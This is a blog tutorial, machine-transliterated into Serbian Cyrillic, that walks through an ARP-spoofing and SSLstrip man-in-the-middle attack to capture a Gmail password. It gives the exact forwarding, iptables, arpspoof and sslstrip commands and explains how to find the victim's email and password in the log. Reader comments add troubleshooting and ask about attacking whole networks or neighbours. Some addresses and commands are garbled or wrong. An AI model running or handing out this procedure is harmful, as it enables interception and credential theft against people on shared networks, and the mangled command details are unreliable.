АрпСпоофинг и ССлстрип у акцији.

Здраво блогери.

За данас имам мали узорак колико опасно може бити повезивање са било којом незаштићеном мрежом оних која се толико нама свиђа.

За данас ћу користити АрпСпоофинг са Сслстрипом да бих добио Гмаил лозинку. Да бих учинио окружење контролиранијим, отворио сам налог под називом „тестарп@гмаил.цом".

А пошто преамбуле не волим много, пређимо на посао.

Ни у једном тренутку нисам одговоран за оно што могу учинити са следећим информацијама. То радим искључиво у образовне сврхе

ЖИВОТНА СРЕДИНА

За овај тест имамо следеће:

1. Нападач: Дебиан Вхеези има мој десктоп или десктоп рачунар. Из спремишта можете инсталирати сслстрип y дснифф доћи до имати арпспоофинг

2. Жртва: Жртва је Андроид таблет који своју пошту жели да види само кроз прегледач.

3. Медијум: Средина је моја Цисцо ДПЦ2425 рутер

АДРЕСЕ.

Адреса нападача: 172.26.0.2

Адреса рутера: КСНУМКС

Адреса жртве: 172.26.0.8

НАПАД:

Да бисте разумели мало више како напад делује, можете отићи до мог старог ПОСТ

Прва ствар коју ћемо учинити за овај напад је да активирамо прослеђивање тако да наш рачунар може проследити информације жртви, а да они то не схватају. (Иначе би то био напад ускраћивања услуга)

За то ћемо користити:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Свака наредба у директном прозору конзоле.

Сада, ако направимо таил -ф из линука, информације видимо уживо и директно

 

снапсхот1

 

Па како онда добити оно што желимо?

Прво унесите своју пошту на Таблет. Док се пријављујемо, видимо да се хиљаде и хиљаде ствари појављују на нашој конзоли.

Сада када сте готови, отворићемо нашу датотеку „десделинук“ помоћу нано-а

nano desdelinux

са Цонтрол + В тражимо нешто што се зове СЕЦУРЕ ПОСТ.

И видећемо овако нешто.

 

снапсхот2

 

Међу том огромном линијом која се не може видети је е-пошта и лозинка жртве.

Па трчимо удесно док коначно не угледамо светлост на крају тунела.

 

снапсхот3

 

Другом приликом ћемо видети како се можемо мало заштитити од ових напада.

поздрави


Садржај чланка се придржава наших принципа уређивачка етика. Да бисте пријавили грешку, кликните овде.

27 коментара, остави свој

Оставите свој коментар

Ваша емаил адреса неће бити објављена. Обавезна поља су означена са *

*

*

  1. За податке одговоран: Мигуел Ангел Гатон
  2. Сврха података: Контрола нежељене поште, управљање коментарима.
  3. Легитимација: Ваш пристанак
  4. Комуникација података: Подаци се неће преносити трећим лицима, осим по законској обавези.
  5. Похрана података: База података коју хостује Оццентус Нетворкс (ЕУ)
  6. Права: У било ком тренутку можете ограничити, опоравити и избрисати своје податке.

  1.   @Јлцмук дијо

    Користим прилику да кажем да када је пост објављен, команде нису биле исправне.

    Команди иптаблес на крају недостаје 8080 који је на другој линији. А онда су команде арпспооф биле на истој линији. Свака наредба је на другој линији.

    Надам се да ће га уредник видети и да може поправити.

    Поздрав.

    1.    Мануел де ла Фуенте дијо

      Направио сам исправке које сте поменули, да ли је то у реду?

      Ако ћете уметнути код у жељени унос, користите ХТМЛ приказ и проверите да ли је чланак тачан пре него што га пошаљете на чекање. Хвала вам.

  2.   Луис дијо

    Хладно је знати да смо они који немамо знање толико рањиви. Веома добре информације чак и кад мало разумем тему схватам важност. Хвала вам!
    поздрави

  3.   Гискард дијо

    Али то функционише само ако су нападач и жртва на истој мрежи. У сваком случају, чини ми се да ако се (налазите се у истој мрежи) повежете помоћу ХТТПС-а, то се не дешава јер су подаци шифровани ПРЕ него што напустите уређај. Ако се повежете путем ХТТП-а (без С), мислим да чак и гледајући мрежни кабл видите кључеве.

    1.    @Јлцмук дијо

      То није тачно. Хакирам гмаил лозинку и ако приметите да гмаил користи хттпс. Тако? Ствар је у томе да, иако је хттпс сигуран, то зависи од хттп-а. Дакле, није тако сигурно.

      Не признајте толико о хттпс-у да С није за Супермана, колико да је „сигуран“

    2.    РТен дијо

      ради са или без хттпс-а, ​​пробао сам са специјализованијим линук дистрибуцијом и ради без проблема

    3.    Мануел де ла Фуенте дијо

      Можете га прецизно користити да научите лекцију онима који вам украду Ви-Фи. 😀

      Отприлике је попут онога што су давно рекли на блогу Цхеме Алонсо:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Раионант дијо

        Остиа, сјајно шта ради! / И онда кажу мом параноику сваки пут кад користим ВПН када оду да провере банковни рачун ...). Успут, у коментарима морате видети колико су људи цинични ... ако на крају краду ...

        1.    елиотиме3000 дијо

          Сада морамо да пређемо на упутство како да креирамо и понудимо сопствену ВПН услугу.

      2.    Данијел дијо

        Прича коју повезујете је врло занимљива, чини ми се чак достојна нове књиге, и ово ме натера да се сетим када сам користио интернет својих комшија и иако кажем да знам тему, мислим да никада не бих могао да видим праве димензије опасност коју сам могао да издржим, на моју срећу, променили су само лозинку у ВПА2 и ту је започела моја прича са ИСП-ом хаха

    4.    Маурицијус дијо

      Зато наслов каже Сслстрип на делу.

      Ради, све док је нападач у средини

  4.   опет дијо

    Који талас радите у призми? -.-
    ne.
    Шта чекате да пошаљете свој захтев КСД
    поздрав
    добар пост

  5.   АуросЗк дијо

    Занимљиво, касније ћу направити едукативни тест ... Можда бих могао и да уклоним лозинку за ВиФи и мало се забавим 😛
    Да ли којим случајем можете ли учинити нешто слично за слање различитих страница на оне које је циљ тражио? На пример, они желе да отворе Фацебоок, а ја их преусмерим на Гоогле? 😛

    1.    @Јлцмук дијо

      Да. Али све је то сасвим другачија рола.

      Можда ћу је објавити касније.

  6.   ластневбие дијо

    врло добар пост, ове теме су врло едукативне, сада морамо бити у стању да се супротставимо овом нападу, јер би се неки (попут мене) повезали са јавним мрежама (универзитет на пример), било би корисно да се то избегне.

    Поздрав!

  7.   само-још-дл-корисник дијо

    Није ми успело 🙁

  8.   вокер дијо

    Нешто ми овде не успева, осим чињенице да су хттпс везе шифроване путем сертификата сервера (када сертификат имате на рачунару, за шифровање је задужен прегледач), помоћу иптаблес преусмеравате порт 80 (хттп), а не 443 што је хттпс

    1.    @Јлцмук дијо

      И ја сам тако мислио. Поента је у томе што, иако је хттпс „сигуран“, нажалост зависи од хттп-а. Дакле, сслстрип то користи, што чини да прегледач верује да користи хттпс акредитиве, али није.

      1.    вокер дијо

        Срање! али прегледач би требало да види упозорење попут „овај сертификат долази са сумњиве локације или слично“ ... Свакако ћу морати да обавим КСД тестове

        1.    @Јлцмук дијо

          Не, апсолутно ништа не излази.

  9.   само-још-дл-корисник дијо

    Напокон ми је успело
    На ВЕП мрежу сам повезан лозинком и она ми је ионако директно показала лозинку.

    Упит. Можете ли да урадите овај исти поступак, али за све рачунаре који су повезани у мрежу, уместо да имате једну жртву?

    1.    @Јлцмук дијо

      Да можете. Али нисам радио експерименте. Пробајте сами и реците нам како сте.

  10.   Синницк19 дијо

    Једино што са овим добијем је да се жртвина машина искључи ван мреже, али сслстрип ми не показује ништа: /

    1.    @Јлцмук дијо

      Морате да онемогућите заштитни зид на тренутак. Или бар омогућити долазне везе.

  11.   Мр Блацк дијо

    Пробе и ја смо могли да видимо само корисничко име и лозинку фацебоок странице, у гмаилу нисам пронашао резултате у дневнику, такође ми је требао само ред арпспооф «арпспооф -и -т«. С друге стране, машина за жртве није могла да отвори неке странице. Наставићу да истражујем, врло је занимљиво. Помоћ онима који користе Мањаро, пакети за инсталирање су: дснифф (овде је арпспофф), твистед и питхон2-пиопенссл. Сслстрип можете преузети овде: http://www.thoughtcrime.org/software/sslstrip/
    Да бисте га покренули $ питхон2 сслстрип.пи
    Поздрав.

  12.   Мр Блацк дијо

    Није изашао, али арпспооф линија је: #арпспооф -и инт -т ип-жертва ип-рутер

  13.   Гилберт дијо

    гледај, радим тачно оно што кажеш:

    ецхо "1"> / проц / сис / нет / ипв4 / ип_форвард иптаблес -т нат -А ПРЕРУТИРАЊЕ -п тцп –дестинатион-порт 80 -ј РЕДИРЕЦТ –то-портс 8080

    арпспооф -и етх0 -т 172.26.0.8 172.26.0.1
    арпспооф -и етх0 -т 172.26.0.1 172.26.0.2

    проблем је у томе што жртва, која је још један рачунар који имам овде у својој соби, немам везе са тим да морам поново покретати рутер, шта ми може помоћи.

    Друга ствар је што радим са виртуелном машином, а када извршим наредбу ивцонфиг, влан0 се не појављује, нити када извршавам ифцонфиг, међутим, ако имам интернет на својој виртуелној машини, шта са етх0 интерфејсом.